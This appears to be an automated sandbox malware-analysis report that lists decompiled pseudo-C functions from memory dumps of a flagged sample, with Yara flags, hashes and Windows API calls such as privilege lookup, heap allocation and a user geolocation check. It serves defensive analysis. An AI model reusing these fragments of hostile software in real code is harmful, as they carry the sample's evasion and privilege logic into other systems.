                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 32cc9155350700c4c1477e1a65f9982cb945ea5bff4badbd4d7e4df6c6859c70
                                                                                            • Instruction ID: 1bab4c0349241372d73440b450a749bdf8e4c7ee4024e4e654d0d8e5aead86fe
                                                                                            • Opcode Fuzzy Hash: 32cc9155350700c4c1477e1a65f9982cb945ea5bff4badbd4d7e4df6c6859c70
                                                                                            • Instruction Fuzzy Hash: 64019B71A8021876E721A6919D47FEF776C9B40B54F14016EFF04BA2C2D7E86D0583F9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041EA94 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 228 41ea94-41eaa0 229 41eaa2-41eabd call 41f2a3 228->229 230 41eaf6-41eafa 228->230 234 41eac2-41ead7 LookupPrivilegeValueW 229->234 232 41eb02-41eb13 230->232 233 41eafd call 41f2a3 230->233 233->232
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF65,0040FF65,?,00000000,?,?), ref: 0041EAD3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 49707c7c662c25746c16c68adb9e7b73c9e8d025905e994a89bc47749931b89d
                                                                                            • Instruction ID: a891066104e5da9bf11ad212dc44c00d328c9f91dd25b19b1774f343a2225232
                                                                                            • Opcode Fuzzy Hash: 49707c7c662c25746c16c68adb9e7b73c9e8d025905e994a89bc47749931b89d
                                                                                            • Instruction Fuzzy Hash: 5401F4B86042406FCB15DFA9CC80EEB7BA9EF86314F144099FE5D4B342D676E815CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E935 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 248 41e935-41e959 249 41e95f-41e974 RtlFreeHeap 248->249 250 41e95a call 41f2a3 248->250 250->249
                                                                                            C-Code - Quality: 54%
                                                                                            			E0041E935(signed int __ecx, char __edx, void* __esi) {
				char _t13;
				void* _t23;

				 *((char*)(_t23 - 0x78)) = __edx;
				asm("in eax, dx");
				_push(__ecx);
				 *(__esi + 0x581a2d45) =  *(__esi + 0x581a2d45) & __ecx;
				_push(_t23);
				_t10 =  *0xFFFFFFFF8B554CB0;
				_push(__esi);
				_t6 = _t10 + 0xaa0; // 0xaa0
				E0041F2A3( *((intOrPtr*)( *0xFFFFFFFF8B554CB0 + 0x14)), _t10, _t6,  *((intOrPtr*)( *0xFFFFFFFF8B554CB0 + 0x14)), 0, 0x35);
				_t13 = RtlFreeHeap( *0xFFFFFFFF8B554CB4,  *0xFFFFFFFF8B554CB8,  *0xFFFFFFFF8B554CBC); // executed
				return _t13;
			}





                                                                                            0x0041e935
                                                                                            0x0041e938
                                                                                            0x0041e939
                                                                                            0x0041e93a
                                                                                            0x0041e943
                                                                                            0x0041e946
                                                                                            0x0041e94c
                                                                                            0x0041e952
                                                                                            0x0041e95a
                                                                                            0x0041e970
                                                                                            0x0041e974

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,819A5F2C,00000000,?), ref: 0041E970
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 2ed438cce4b9f32b77f8c2b8d3f84d072bade8191d19fbdd11b15b1aa245824d
                                                                                            • Instruction ID: 338b4c93ac722624bcc429bfc6f8675900b2c6dff8f4a978b3ae9b9c036a0816
                                                                                            • Opcode Fuzzy Hash: 2ed438cce4b9f32b77f8c2b8d3f84d072bade8191d19fbdd11b15b1aa245824d
                                                                                            • Instruction Fuzzy Hash: 2CE0E5B16042006FD714CF95DC45EE73B98EF98304F10445DFC489B252C170E800CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E943 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0041E943(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F2A3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                            0x0041e952
                                                                                            0x0041e95a
                                                                                            0x0041e970
                                                                                            0x0041e974

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,819A5F2C,00000000,?), ref: 0041E970
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                            • Instruction ID: 0eeed742e855e1a5aabbb0bd01fd15a482095f816eba7bbcf91efb37d0486c22
                                                                                            • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                            • Instruction Fuzzy Hash: 6CE012B5600208ABCB14EF89DC49EA737ACAF88754F018059BA095B282C671E914CAB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E975 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E9AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 9ded88e9250e8131e4a31cf9a1383db112dc2a47bd89635232ad9ce073ea0e4c
                                                                                            • Instruction ID: dc13535f9e9621aa9b7e7bcd85db606f33c5685adde58964b9c4263278005677
                                                                                            • Opcode Fuzzy Hash: 9ded88e9250e8131e4a31cf9a1383db112dc2a47bd89635232ad9ce073ea0e4c
                                                                                            • Instruction Fuzzy Hash: B9E026706002047FC7228F548C45FE3379C9F05210F05809479481B242C574E942C2E4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E903 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 257 41e903-41e934 call 41f2a3 RtlAllocateHeap
                                                                                            C-Code - Quality: 100%
                                                                                            			E0041E903(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F2A3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                            0x0041e912
                                                                                            0x0041e91a
                                                                                            0x0041e930
                                                                                            0x0041e934

                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00418D16,?,004194B0,004194B0,?,00418D16,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E930
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                            • Instruction ID: 62f3eee376e28cf544592ca8191d8779ff411a1ecb4591b582d27680a5294a92
                                                                                            • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                            • Instruction Fuzzy Hash: 0BE012B6610208ABCB14EF89DC45EA737ACAF88664F018059BA085B242C671F9148AB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00410113 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 251 410113-41012c 252 410132-410137 251->252 253 41012d call 419653 251->253 254 410139-41013a 252->254 255 41013b-41013f GetUserGeoID 252->255 253->252 256 410141-41014c 255->256
                                                                                            C-Code - Quality: 37%
                                                                                            			E00410113(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419653(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                                            0x0041012d
                                                                                            0x00410137
                                                                                            0x0041013d
                                                                                            0x0041014c
                                                                                            0x0041013a
                                                                                            0x0041013a
                                                                                            0x0041013a

                                                                                            APIs
                                                                                            • GetUserGeoID.KERNELBASE(00000010), ref: 0041013D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: User
                                                                                            • String ID:
                                                                                            • API String ID: 765557111-0
                                                                                            • Opcode ID: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
                                                                                            • Instruction ID: 8cc873036d79a2fdddc9869580214de1b70d71d982e8a92b1ad325ff540efa0c
                                                                                            • Opcode Fuzzy Hash: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
                                                                                            • Instruction Fuzzy Hash: 47E0C27368030466F72091A58C86FA6324E5B84B10F048475F90CDA2C1E499E8C04024
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041EAA3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0041EAA3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F2A3( *((intOrPtr*)(_a4 + 0x540)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x540)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                            0x0041eabd
                                                                                            0x0041ead3
                                                                                            0x0041ead7

                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF65,0040FF65,?,00000000,?,?), ref: 0041EAD3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 3e91afb305c7c16e3f9ca9b56037ee7866278f8e53ea3b3c93ebcc3ff2bd1067
                                                                                            • Instruction ID: f42e14564184be09189b2d8eae0df708caeb248a44d478c69742f1e13143638e
                                                                                            • Opcode Fuzzy Hash: 3e91afb305c7c16e3f9ca9b56037ee7866278f8e53ea3b3c93ebcc3ff2bd1067
                                                                                            • Instruction Fuzzy Hash: 51E01AB56002046BC710DF89CC45EE737ADAF88654F114069FA0C57242D675E8548AB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E983 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0041E983(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F2A3( *((intOrPtr*)(_a4 + 0x90)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x90)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                            0x0041e986
                                                                                            0x0041e99d
                                                                                            0x0041e9ab

                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E9AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 5cdadb2b3bdc9f4058fe36b71ca8c83ecf4795cff0b9723a80d3605c59ae9000
                                                                                            • Instruction ID: 8564a69c91694fe0bd64aa2eb7c12f24eddc3a8ce2b079fe4a510586a7ab792e
                                                                                            • Opcode Fuzzy Hash: 5cdadb2b3bdc9f4058fe36b71ca8c83ecf4795cff0b9723a80d3605c59ae9000
                                                                                            • Instruction Fuzzy Hash: 7CD012756002147FC620DB99CC45FD7779CDF45654F0540A5BA4C5B642C575BA10C7E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                                                                            • Instruction ID: 8a38b42fe32e271f9afc1009965e08f4e64431d8948f43410f85fe4134f53a69
                                                                                            • Opcode Fuzzy Hash: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                                                                            • Instruction Fuzzy Hash: 8FB092B29064C5CAEB11E7B04A08B2B7E04BBE0741F27C076E2120681B4778C491F6B6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00AA6A60 Relevance: .2, Instructions: 227COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 66%
                                                                                            			E00AA6A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0xb6d360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E00AB9810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0xb66908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E00ABCF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E00ABCF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E00ABD340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E00ABB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E00ABAA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E00ABD000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E00ABAA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}






















































                                                                                            0x00aa6a6f
                                                                                            0x00aa6a72
                                                                                            0x00aa6a78
                                                                                            0x00aa6a7c
                                                                                            0x00aa6a7f
                                                                                            0x00aa6a87
                                                                                            0x00ae8049
                                                                                            0x00ae8049
                                                                                            0x00ae804e
                                                                                            0x00ae804f
                                                                                            0x00ae8057
                                                                                            0x00ae805c
                                                                                            0x00000000
                                                                                            0x00aa6a8d
                                                                                            0x00aa6a92
                                                                                            0x00aa6a92
                                                                                            0x00aa6a94
                                                                                            0x00aa6a99
                                                                                            0x00aa6a9c
                                                                                            0x00aa6a9f
                                                                                            0x00aa6aa2
                                                                                            0x00aa6aaa
                                                                                            0x00aa6ab0
                                                                                            0x00ae7eae
                                                                                            0x00ae7eb4
                                                                                            0x00ae7eb9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00ae7ebf
                                                                                            0x00ae7ebf
                                                                                            0x00ae7ebf
                                                                                            0x00ae7ec1
                                                                                            0x00ae7ec6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00ae7ece
                                                                                            0x00ae7edb
                                                                                            0x00ae7ee5
                                                                                            0x00ae7ee7
                                                                                            0x00ae7ee7
                                                                                            0x00ae7edd
                                                                                            0x00ae7edd
                                                                                            0x00ae7edd
                                                                                            0x00ae7eea
                                                                                            0x00ae7ed0
                                                                                            0x00ae7ed0
                                                                                            0x00ae7ed3
                                                                                            0x00ae7ed3
                                                                                            0x00ae7eec
                                                                                            0x00ae7ef8
                                                                                            0x00ae7f00
                                                                                            0x00ae7f07
                                                                                            0x00ae7f0a
                                                                                            0x00ae7f19
                                                                                            0x00ae7f1b
                                                                                            0x00ae7f23
                                                                                            0x00ae7f25
                                                                                            0x00ae7f28
                                                                                            0x00ae7f2e
                                                                                            0x00ae7f31
                                                                                            0x00ae7f34
                                                                                            0x00ae7f37
                                                                                            0x00ae7f3c
                                                                                            0x00000000
                                                                                            0x00ae7f3e
                                                                                            0x00ae7f3e
                                                                                            0x00ae7f41
                                                                                            0x00aa6b35
                                                                                            0x00aa6b38
                                                                                            0x00aa6b44
                                                                                            0x00aa6b4c
                                                                                            0x00aa6b4e
                                                                                            0x00aa6b51
                                                                                            0x00aa6b69
                                                                                            0x00aa6b69
                                                                                            0x00ae7f3c
                                                                                            0x00ae8046
                                                                                            0x00000000
                                                                                            0x00ae8046
                                                                                            0x00aa6abc
                                                                                            0x00aa6aca
                                                                                            0x00ae7f49
                                                                                            0x00aa6b13
                                                                                            0x00aa6b13
                                                                                            0x00aa6b16
                                                                                            0x00aa6b1e
                                                                                            0x00ae7fe7
                                                                                            0x00ae7fea
                                                                                            0x00ae7fed
                                                                                            0x00ae7ff0
                                                                                            0x00ae7ff2
                                                                                            0x00ae7ff4
                                                                                            0x00ae7ffa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00ae8000
                                                                                            0x00ae8003
                                                                                            0x00ae8006
                                                                                            0x00ae8009
                                                                                            0x00ae800b
                                                                                            0x00ae800d
                                                                                            0x00ae8010
                                                                                            0x00ae801f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00ae8025
                                                                                            0x00aa6b2f
                                                                                            0x00aa6b2f
                                                                                            0x00aa6b32
                                                                                            0x00000000
                                                                                            0x00aa6b32
                                                                                            0x00aa6b26
                                                                                            0x00ae8030
                                                                                            0x00ae803a
                                                                                            0x00ae803c
                                                                                            0x00ae803c
                                                                                            0x00ae8032
                                                                                            0x00ae8032
                                                                                            0x00ae8032
                                                                                            0x00ae803f
                                                                                            0x00aa6b2c
                                                                                            0x00aa6b2c
                                                                                            0x00aa6b2c
                                                                                            0x00000000
                                                                                            0x00aa6b26
                                                                                            0x00aa6ad0
                                                                                            0x00aa6ad6
                                                                                            0x00aa6ade
                                                                                            0x00aa6ae0
                                                                                            0x00aa6ae0
                                                                                            0x00aa6ae5
                                                                                            0x00ae7f53
                                                                                            0x00aa6aeb
                                                                                            0x00aa6aeb
                                                                                            0x00aa6aeb
                                                                                            0x00aa6af3
                                                                                            0x00ae7f5e
                                                                                            0x00ae7f61
                                                                                            0x00ae7f68
                                                                                            0x00ae7f69
                                                                                            0x00ae7f6b
                                                                                            0x00ae7f70
                                                                                            0x00ae7f71
                                                                                            0x00ae7f76
                                                                                            0x00ae7f77
                                                                                            0x00ae7f7c
                                                                                            0x00ae7f86
                                                                                            0x00ae7f88
                                                                                            0x00ae7f8d
                                                                                            0x00ae7f92
                                                                                            0x00ae7f97
                                                                                            0x00ae7f98
                                                                                            0x00ae7f99
                                                                                            0x00ae7f9a
                                                                                            0x00ae7f9f
                                                                                            0x00ae7fa0
                                                                                            0x00ae7fa5
                                                                                            0x00ae7faa
                                                                                            0x00ae7faa
                                                                                            0x00ae7faf
                                                                                            0x00ae7fdc
                                                                                            0x00ae7fdf
                                                                                            0x00000000
                                                                                            0x00ae7fb1
                                                                                            0x00ae7fb1
                                                                                            0x00ae7fb3
                                                                                            0x00ae7fb8
                                                                                            0x00ae7fd4
                                                                                            0x00ae7fd4
                                                                                            0x00000000
                                                                                            0x00ae7fd4
                                                                                            0x00ae7fba
                                                                                            0x00ae7fbc
                                                                                            0x00ae7fc2
                                                                                            0x00ae7fc4
                                                                                            0x00ae7fc4
                                                                                            0x00ae7fc7
                                                                                            0x00ae7fcb
                                                                                            0x00ae7fcc
                                                                                            0x00ae7fd1
                                                                                            0x00000000
                                                                                            0x00ae7fd1
                                                                                            0x00aa6b04
                                                                                            0x00aa6b04
                                                                                            0x00aa6b0b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00aa6b11
                                                                                            0x00000000
                                                                                            0x00aa6b11
                                                                                            0x00aa6af3

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 172323008fd178fbdc239bc01e8c01095e258f8e479605fcf98539e9d57ed55b
                                                                                            • Instruction ID: 6c3e310783eed860fd3f5a45d19ea4c22943bdc4213b80ca1294a8d445a57ae9
                                                                                            • Opcode Fuzzy Hash: 172323008fd178fbdc239bc01e8c01095e258f8e479605fcf98539e9d57ed55b
                                                                                            • Instruction Fuzzy Hash: 05816F71E002599FDB14CF99C981BEDBBF5EF09340F188069E949EB281D735AD05CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB98A0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
